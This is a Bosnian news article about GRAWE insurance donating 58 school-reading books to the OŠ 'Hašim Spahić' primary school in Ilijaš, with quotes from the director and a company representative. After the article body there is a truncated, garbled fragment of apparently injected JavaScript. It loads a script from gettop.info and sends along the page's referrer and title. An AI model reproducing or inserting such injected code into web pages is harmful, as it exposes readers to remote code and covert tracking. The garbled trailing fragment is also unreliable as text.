GRAWE osiguranje doniralo 58 knjiga OŠ “Hašim Spahić”

U prostorijama OŠ „Hašim Spahić“ Ilijaš, predstavnici GRAWE osiguranja d.d. Sarajevo, uručili su donaciju od 58 knjiga koje će biti dostupne u biblioteci za učenike ove škole. Radi se o nekoliko naslova obavezne lektire ali i proširene literature. Mirsad Kustura,  direktor OŠ „Hašim Spahić“ Ilijaš  izrazio je veliku zahvalnost u ime učenika i zaposlenika na izuzetno važnom  poklonu.

„Nema ništa ljepše za jednu školu, za jednog učenika, za nastavnika od poklona u vidu knjige. Hvala GRAWE osiguranju na osjećaju za potrebe naših učenika jer vidim da oni to rade i od ranije, pomažu učenike i sportiste. Ovo je za nas jedan predivan poklon. Naslovi su u najvećem dijelu u sklopu obavezne lektire, ali i oni iz proširene literature. Čitav opus koji smo dobili je za uzrast učenika do 15 godina“, kazao je direktor Kustura.

Haris Ćorić iz Odjela marketinga GRAWE osiguranja d.d. Sarajevo kazao je da je ovoj kompaniji veoma bitno društveno odgovorno poslovanje.

„Povjerenje, snaga, poštenje, kvalitet, stabilnost i društveno odgovorno poslovanje su glavne odlike GRAWE osiguranja odnosno osiguranja na Vašoj strani. Ured GRAWE osiguranja u Ilijašu ostvaruje veoma dobre rezultate, i građani imaju veliko povjerenje i u naše zaposlenike i u našu kompaniju. Građani imaju povjerenje u nas zbog dobrih i kvalitetnih programa osiguranja koje nudimo, kao i zbog korektnog ispunjavanja svih naših obaveza prema klijentima.  Ove godine smo se odlučili, kao i prethodnih godina, da uradimo jednu društveno odgovornu donaciju za lokalnu zajednicu Ilijaš. Naša donacija je usmjerena prema kupovini školskih lektira za potrebe OŠ „Hašim Spahić“ u Ilijašu. Donirali smo naslove domaćih i stranih autora, te se nadamo da će mnoge sadašnje i buduće generacije učenika ove škole učiti, čitati i uživati u ovim velikim ostvarenjima domaće i svjetske književnosti. Navest ćemo poznatu izreku o važnosti čitanja, koja je prikladna za ovaj lijepi povod: „Dijete koje čita postaje čovjek koji misli“, kazao je Ćorić.

Direktor OŠ „Hašim Spahić“ zahvalio se predstavnicima GRAWE osiguranja na uručenoj donaciji, te izrazio nadu da će i druge kompanije i institucije slijediti primjer GRAWE osiguranja i podržati rad kako OŠ „Hašim Spahić“  tako i drugih škola.

}s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;